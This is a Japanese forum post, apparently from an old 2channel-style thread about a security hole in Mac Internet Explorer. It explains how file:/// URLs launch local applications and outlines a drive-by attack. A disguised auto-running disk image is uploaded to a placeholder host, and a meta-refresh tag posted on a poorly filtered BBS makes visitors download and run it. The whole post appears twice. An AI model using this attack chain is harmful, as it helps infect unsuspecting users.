【速報】Mac版 IEにセキュリティホール【速報】
74 :ta:
>>71
>file:///で指定した「アプリケーション」を実行できてしまう。
もし、71のHDがMacintosh HDだった場合、
file:///Macintosh%20HD/Applications%20(Mac%20OS%209)/Sherlock%202
って指定するとシャーロックが立ち上がる。ってこと。
これを悪用すると、Web見に来た人に黒アプリをダウンロードさせて実行させることが可能ってこと。
ここまでは、IE とiCabだけの問題。
ただ、同じコトがもっと簡単に、いろんなブラウザ対象でできる、
ってのが>>42の穴
>>42で新たに見つかった穴では、こんなコトが可能。
1マカが困るアプリ(macasine.app)書く(>>66が指摘したようにOS XだとAppleScript からシェル動かせるから強力)
2ディスクイメージ作ってアプリ埋め込む。
3何らかの方法(シェアウエアもある)でマウント時、自動実行できるように処理
4sit圧縮してどっかのフリースペースのアップローダにアップする。(hogegege.com/public/macasine.img.sit)
5hogegege.com/public/macasine.img.sitへのリンクを貼る
6誰かがクリックしたあと、ダウンロード>解凍>実行>ウマー までノンストップ
または、
5タグ処理のずさんなBBSかチャットに<Meta refresh ....hogegege.com/public/macasine.img.sit>をカキコ
6誰かがBBSを見に来る>ダウンロード>解凍>実行>ウマー までノンストップ
OSの設定がデフォルトなら、Netscape6.xかMozilla以外のすべてのブラウザで可能になる。
Classicが起動してる状態ならOS Xでも動くからタチ悪い。
これでどう?
>file:///で指定した「アプリケーション」を実行できてしまう。
もし、71のHDがMacintosh HDだった場合、
file:///Macintosh%20HD/Applications%20(Mac%20OS%209)/Sherlock%202
って指定するとシャーロックが立ち上がる。ってこと。
これを悪用すると、Web見に来た人に黒アプリをダウンロードさせて実行させることが可能ってこと。
ここまでは、IE とiCabだけの問題。
ただ、同じコトがもっと簡単に、いろんなブラウザ対象でできる、
ってのが>>42の穴
>>42で新たに見つかった穴では、こんなコトが可能。
1マカが困るアプリ(macasine.app)書く(>>66が指摘したようにOS XだとAppleScript からシェル動かせるから強力)
2ディスクイメージ作ってアプリ埋め込む。
3何らかの方法(シェアウエアもある)でマウント時、自動実行できるように処理
4sit圧縮してどっかのフリースペースのアップローダにアップする。(hogegege.com/public/macasine.img.sit)
5hogegege.com/public/macasine.img.sitへのリンクを貼る
6誰かがクリックしたあと、ダウンロード>解凍>実行>ウマー までノンストップ
または、
5タグ処理のずさんなBBSかチャットに<Meta refresh ....hogegege.com/public/macasine.img.sit>をカキコ
6誰かがBBSを見に来る>ダウンロード>解凍>実行>ウマー までノンストップ
OSの設定がデフォルトなら、Netscape6.xかMozilla以外のすべてのブラウザで可能になる。
Classicが起動してる状態ならOS Xでも動くからタチ悪い。
これでどう?
|
|
|